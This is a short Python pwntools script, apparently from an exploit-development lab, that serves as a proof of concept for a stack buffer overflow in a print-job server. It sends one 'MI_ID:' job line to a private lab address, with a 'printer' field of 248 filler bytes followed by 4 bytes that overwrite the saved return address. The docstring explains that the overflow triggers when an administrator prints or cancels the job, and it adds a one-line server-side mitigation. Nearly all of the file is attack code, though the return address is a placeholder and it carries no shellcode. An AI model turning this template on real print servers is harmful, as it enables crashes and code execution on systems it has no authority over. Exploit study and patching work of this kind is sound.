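#!/usr/bin/python3
"""Proof of concept for a stack overflow in the print-job server's "printer" field.

One crafted job is submitted. The server does not fail on receipt; the
overflow is only reached later, when an administrator prints or cancels the
job, so this client reads nothing back and simply exits.
"""
from pwn import *

SERVER_IP = "192.168.56.101"
SERVER_PORT = 10000

# The "printer" field is backed by a 248-byte buffer.  The value is the name,
# filler up to the buffer size, then 4 bytes that land on the saved return
# address.  (The original offset probe was simply PAYLOAD = b"A" * 248.)
PRINTER_FIELD_SIZE = 248
PAYLOAD = b"IMPRESORA"                                        # OFFSET
PAYLOAD += b"A" * (PRINTER_FIELD_SIZE - len("IMPRESORA"))     # OFFSET
PAYLOAD += b"B" * 4                                           # RET ADDRESS


def bof(ip, port):
    """
    Submit one oversized print job to the server at ``ip``:``port``.

    A client can create print jobs on the server by sending it a line that
    starts with "MI_ID: ".  In the "printer" field of that line there is a
    stack overflow if a string longer than 248 bytes is sent.  The overflow
    occurs when the server administrator tries to print or cancel the
    malicious job, not at submission time, so nothing is awaited here.

    Server-side mitigation: bound the copy of the printer field to its
    248-byte buffer and reject (or truncate and log) jobs that exceed it.

    Args:
        ip: address of the print-job server.
        port: TCP port the server listens on.

    Returns:
        None.  Connection errors raised by ``remote`` propagate to the caller.
    """
    s = remote(ip, port)
    try:
        # PAYLOAD occupies the printer field; every other token is a fixed
        # placeholder.  The line is CRLF-terminated.
        s.send(b"MI_ID: 1 pendiente 0 1 1 documento " + PAYLOAD + b" usuario-01 pc-01\r\n")
    finally:
        # The original never closed the tube; release the socket even if
        # send() fails.
        s.close()


if __name__ == "__main__":
    bof(SERVER_IP, SERVER_PORT)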